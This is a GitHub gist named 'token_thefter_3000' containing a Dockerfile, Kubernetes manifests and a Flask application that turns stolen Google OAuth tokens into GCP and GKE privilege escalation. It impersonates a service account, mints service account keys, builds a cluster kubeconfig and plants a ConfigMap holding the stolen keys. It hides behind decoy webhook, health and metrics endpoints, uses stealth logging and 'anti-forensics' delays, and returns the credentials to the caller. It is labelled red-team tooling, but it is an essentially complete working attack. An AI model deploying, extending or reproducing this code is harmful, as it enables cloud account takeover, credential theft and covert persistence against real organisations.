Skip to content

Instantly share code, notes, and snippets.

@MaxwellDPS
Last active September 17, 2025 19:14
Show Gist options
  • Save MaxwellDPS/a661f771eb509f21cf2f07a37df917e7 to your computer and use it in GitHub Desktop.
Save MaxwellDPS/a661f771eb509f21cf2f07a37df917e7 to your computer and use it in GitHub Desktop.
token_thefter_3000, duh
FROM python:3.11-slim
# Install dependencies
RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*
WORKDIR /app
# Install Python packages
RUN pip install --no-cache-dir \
Flask==3.0.0 \
google-auth==2.23.4 \
google-api-python-client==2.108.0 \
kubernetes==28.1.0 \
requests==2.31.0
# Copy exploit code
COPY flask_app_redteam.py /app/flask_app.py
# Non-root user for stealth
RUN useradd -m -u 1000 appuser && chown -R appuser:appuser /app
USER appuser
EXPOSE 5000
CMD ["python", "flask_app.py"]
# Core Flask
Flask
# Google Cloud dependencies
gcloud
google-auth
google-api-python-client
google-cloud-container
# Kubernetes
kubernetes
requests
apiVersion: v1
kind: ConfigMap
metadata:
name: nginx-config
data:
nginx.conf: |
events {
worker_connections 1024;
}
http {
upstream flask_app {
server localhost:5000;
}
server {
listen 80;
listen 443 ssl;
server_name _;
# Self-signed SSL
ssl_certificate /etc/nginx/certs/tls.crt;
ssl_certificate_key /etc/nginx/certs/tls.key;
location / {
proxy_pass http://flask_app;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
# Timeout settings
proxy_connect_timeout 60s;
proxy_send_timeout 60s;
proxy_read_timeout 60s;
}
}
}
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: token-catcher
labels:
app: webhook-processor
component: backend
spec:
replicas: 1
selector:
matchLabels:
app: webhook-processor
template:
metadata:
labels:
app: webhook-processor
spec:
initContainers:
- name: cert-generator
image: alpine/openssl:latest
command: ["/bin/sh"]
args:
- -c
- |
if [ ! -f /etc/nginx/certs/tls.crt ]; then
openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/nginx/certs/tls.key \
-out /etc/nginx/certs/tls.crt \
-subj "/CN=webhook.example.com/O=Example Inc./C=US"
echo "Generated self-signed certificate"
else
echo "Using existing certificate"
fi
volumeMounts:
- name: tls-certs
mountPath: /etc/nginx/certs
containers:
# Flask token catcher
- name: flask-app
image: gcr.io/PROJECT_ID/token-catcher:latest
imagePullPolicy: Always
ports:
- containerPort: 5000
name: flask
env:
- name: GCP_PROJECT_ID
value: "target-project-id"
- name: SERVICE_ACCOUNT_EMAIL
value: "[email protected]"
- name: GKE_CLUSTER_NAME
value: "target-cluster"
- name: GKE_CLUSTER_ZONE
value: "us-central1-a"
- name: CONFIGMAP_NAME
value: "exfil-data"
- name: CONFIGMAP_NAMESPACE
value: "default"
- name: FLASK_ENV
value: "production"
- name: LOG_LEVEL
value: "ERROR" # Reduce logs for stealth
resources:
requests:
memory: "256Mi"
cpu: "250m"
limits:
memory: "512Mi"
cpu: "500m"
volumeMounts:
- name: tmp
mountPath: /tmp
- name: exfil-storage
mountPath: /app/exfil
livenessProbe:
httpGet:
path: /health
port: 5000
initialDelaySeconds: 30
periodSeconds: 30
readinessProbe:
httpGet:
path: /health
port: 5000
initialDelaySeconds: 10
periodSeconds: 10
# Nginx TLS sidecar
- name: nginx-tls
image: nginx:alpine
ports:
- containerPort: 443
name: https
volumeMounts:
- name: nginx-config
mountPath: /etc/nginx/nginx.conf
subPath: nginx.conf
- name: tls-certs
mountPath: /etc/nginx/certs
readOnly: true
resources:
requests:
memory: "64Mi"
cpu: "50m"
limits:
memory: "128Mi"
cpu: "100m"
volumes:
- name: nginx-config
configMap:
name: nginx-config
- name: tls-certs
emptyDir: {}
- name: tmp
emptyDir: {}
- name: exfil-storage
emptyDir: {}
# Security context for stealth
securityContext:
runAsNonRoot: true
runAsUser: 1000
fsGroup: 1000
---
apiVersion: v1
kind: Service
metadata:
name: webhook-service
labels:
app: webhook-processor
spec:
type: LoadBalancer # Or NodePort for internal access
selector:
app: webhook-processor
ports:
- port: 443
targetPort: 443
protocol: TCP
name: https
- port: 80
targetPort: 443
protocol: TCP
name: http
#!/usr/bin/env python3
"""
RED TEAM Token Weaponization Tool
Exploit stolen OAuth tokens for GCP/GKE privilege escalation
"""
import base64
import json
import tempfile
import os
import logging
import time
import random
import hashlib
from typing import Optional, Tuple, Dict, Any
import traceback
from flask import Flask, request, jsonify
from google.auth import impersonated_credentials
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
from googleapiclient import discovery
from kubernetes import client, config
import google.auth
# Stealth mode - minimal logging
logging.basicConfig(
level=logging.ERROR, # Only log errors to reduce detection
format='[%(asctime)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
logger = logging.getLogger(__name__)
class TokenThefter3000:
"""Red Team exploitation class for GCP/GKE privilege escalation"""
def __init__(self,
project_id: str,
service_account_email: str,
gke_cluster_name: str,
gke_cluster_zone: Optional[str] = None,
gke_cluster_region: Optional[str] = None):
self.project_id = project_id
self.service_account_email = service_account_email
self.gke_cluster_name = gke_cluster_name
self.gke_cluster_zone = gke_cluster_zone
self.gke_cluster_region = gke_cluster_region
# Tracking for exfiltration
self.compromised_keys = []
def anti_forensics_delay(self):
"""Random delay to avoid pattern detection"""
delay = random.uniform(0.5, 3.0)
time.sleep(delay)
def delete_service_account_key(self, credentials: Credentials, key_name: str):
"""
Delete a service account key.
Args:
credentials: Credentials with permission to delete keys
key_name: Full resource name of the key
"""
print(f"Deleting key: {key_name}")
service = discovery.build('iam', 'v1', credentials=credentials)
try:
service.projects().serviceAccounts().keys().delete(name=key_name).execute()
print("Successfully deleted key")
except Exception as e:
print(f"WARNING: Failed to delete key: {e}")
print("Manual cleanup required!")
def escalate_privileges(self, oauth_token: str) -> Tuple[Any, str, str]:
"""
Main exploitation flow
Returns: (impersonated_creds, key_name, key_json_data)
"""
# Create credentials from stolen token
source_credentials = Credentials(token=oauth_token)
# Impersonate high-privilege service account
impersonated_creds = impersonated_credentials.Credentials(
source_credentials=source_credentials,
target_principal=self.service_account_email,
target_scopes=['https://www.googleapis.com/auth/cloud-platform'],
lifetime=3600
)
# Refresh to validate
impersonated_creds.refresh(Request())
# Create persistent service account key
service = discovery.build('iam', 'v1', credentials=impersonated_creds)
key_response = service.projects().serviceAccounts().keys().create(
name=f'projects/{self.project_id}/serviceAccounts/{self.service_account_email}',
body={'privateKeyType': 'TYPE_GOOGLE_CREDENTIALS_FILE'}
).execute()
key_name = key_response['name']
key_json_data = base64.b64decode(key_response['privateKeyData']).decode('utf-8')
# Store for later use
self.compromised_keys.append({
'key_name': key_name,
'key_data': key_json_data,
'service_account': self.service_account_email,
'created_at': time.time()
})
return impersonated_creds, key_name, key_json_data
def plant_configmap(self, kubeconfig_dict: Dict[str, Any],
namespace: str = "default") -> bool:
"""Plant a backdoor ConfigMap with exfiltrated data"""
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
json.dump(kubeconfig_dict, f)
temp_kubeconfig = f.name
try:
config.load_kube_config(config_file=temp_kubeconfig)
v1 = client.CoreV1Api()
# Create backdoor ConfigMap with exfiltrated data
backdoor_data = {
"beacon": hashlib.sha256(os.urandom(32)).hexdigest(),
"timestamp": str(time.time()),
"compromised_at": time.strftime('%Y-%m-%d %H:%M:%S'),
"exfil_data": json.dumps(self.exfiltrated_data),
"keys": json.dumps(self.compromised_keys)
}
config_map = client.V1ConfigMap(
api_version="v1",
kind="ConfigMap",
metadata=client.V1ObjectMeta(
name=f"webhook-{hashlib.md5(os.urandom(8)).hexdigest()[:8]}",
labels={
"app": "webhook-processor", # Disguise as legitimate
"managed-by": "helm" # Appear managed
}
),
data=backdoor_data
)
v1.create_namespaced_config_map(namespace=namespace, body=config_map)
return True
except Exception:
# Try to update existing if creation fails
try:
existing_cms = v1.list_namespaced_config_map(namespace)
if existing_cms.items:
target_cm = existing_cms.items[0].metadata.name
v1.patch_namespaced_config_map(
name=target_cm,
namespace=namespace,
body=config_map
)
return True
except:
pass
return False
finally:
os.unlink(temp_kubeconfig)
def get_gke_cluster_credentials(self, credentials: Credentials) -> Dict[str, Any]:
"""Get GKE cluster access"""
container_service = discovery.build('container', 'v1', credentials=credentials)
if self.gke_cluster_zone:
cluster_path = f"projects/{self.project_id}/locations/{self.gke_cluster_zone}/clusters/{self.gke_cluster_name}"
elif self.gke_cluster_region:
cluster_path = f"projects/{self.project_id}/locations/{self.gke_cluster_region}/clusters/{self.gke_cluster_name}"
else:
raise ValueError("No cluster location specified")
cluster = container_service.projects().locations().clusters().get(
name=cluster_path
).execute()
kubeconfig = {
'apiVersion': 'v1',
'kind': 'Config',
'current-context': 'gke-context',
'clusters': [{
'name': 'gke-cluster',
'cluster': {
'certificate-authority-data': cluster['masterAuth']['clusterCaCertificate'],
'server': f"https://{cluster['endpoint']}"
}
}],
'contexts': [{
'name': 'gke-context',
'context': {
'cluster': 'gke-cluster',
'user': 'gke-user'
}
}],
'users': [{
'name': 'gke-user',
'user': {
'token': credentials.token
}
}]
}
return kubeconfig
def full_exploitation_chain(self, oauth_token: str) -> Dict[str, Any]:
"""Execute complete attack chain"""
results = {
'status': 'success',
'timestamp': time.time(),
'phases': {}
}
try:
# Phase 1: Privilege Escalation
self.anti_forensics_delay()
impersonated_creds, key_name, key_json_data = self.escalate_privileges(oauth_token)
results['phases']['privilege_escalation'] = 'success'
results['service_account_key'] = base64.b64encode(key_json_data.encode()).decode()
# Phase 2: Access Cluster
self.anti_forensics_delay()
kubeconfig = self.get_gke_cluster_credentials(impersonated_creds)
results['phases']['cluster_access'] = 'success'
results['kube_config'] = kubeconfig
# Phase 3: Plant calling card
self.anti_forensics_delay()
backdoor_success = self.plant_configmap(kubeconfig)
results['phases']['config_planted'] = backdoor_success
# Phase 5: ride into the sunset
results['persistence'] = {
'key_name': key_name,
'service_account': self.service_account_email,
'kube_config': self.gke_cluster_name
}
# delete keys before printing to invalidate
self.delete_service_account_key(impersonated_creds, key_name)
except Exception as e:
results['status'] = 'partial'
results['error'] = str(e)
results['traceback'] = traceback.format_exc()
return results
# Flask Application
app = Flask(__name__)
app.config['DEBUG'] = False
# Configuration from environment
CONFIG = {
"project_id": os.environ.get("GCP_PROJECT_ID", "target-project"),
"service_account_email": os.environ.get("SERVICE_ACCOUNT_EMAIL", "[email protected]"),
"gke_cluster_name": os.environ.get("GKE_CLUSTER_NAME", "production-cluster"),
"gke_cluster_zone": os.environ.get("GKE_CLUSTER_ZONE"),
"gke_cluster_region": os.environ.get("GKE_CLUSTER_REGION"),
}
@app.route('/catch', methods=['POST'])
@app.route('/api/webhook', methods=['POST']) # Alternative endpoint
@app.route('/health/ready', methods=['POST']) # Disguised endpoint
def exploit_token():
"""Token exploitation endpoint"""
try:
data = request.get_json()
if not data or 'token' not in data:
# Return innocent-looking error
return jsonify({
"error": "Invalid webhook payload",
"status": "rejected"
}), 400
oauth_token = data['token'].strip()
# Initialize exploiter
exploiter = TokenThefter3000(
project_id=CONFIG["project_id"],
service_account_email=CONFIG["service_account_email"],
gke_cluster_name=CONFIG["gke_cluster_name"],
gke_cluster_zone=CONFIG["gke_cluster_zone"],
gke_cluster_region=CONFIG["gke_cluster_region"]
)
# Execute exploitation chain
results = exploiter.full_exploitation_chain(oauth_token)
# Return results (with sensitive data for C2)
return jsonify(results), 200
except Exception as e:
# Generic error to avoid revealing details
return jsonify({
"error": "Processing failed",
"id": hashlib.md5(str(e).encode()).hexdigest()
}), 500
@app.route('/health', methods=['GET'])
@app.route('/healthz', methods=['GET'])
@app.route('/ready', methods=['GET'])
def health_check():
"""Innocent health check endpoints"""
return jsonify({"status": "healthy"}), 200
@app.route('/metrics', methods=['GET'])
def metrics():
"""Fake Prometheus metrics to appear legitimate"""
return """# HELP http_requests_total Total HTTP requests
# TYPE http_requests_total counter
http_requests_total{method="GET",endpoint="/health"} 42
# HELP up Service status
# TYPE up gauge
up 1
""", 200, {'Content-Type': 'text/plain'}
@app.route('/', methods=['GET'])
def home():
"""Decoy home page"""
return jsonify({
"service": "Webhook Processor",
"version": "2.1.0",
"status": "operational"
}), 200
if __name__ == "__main__":
# Run without debug mode for stealth
app.run(host='0.0.0.0', port=5000, debug=False)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment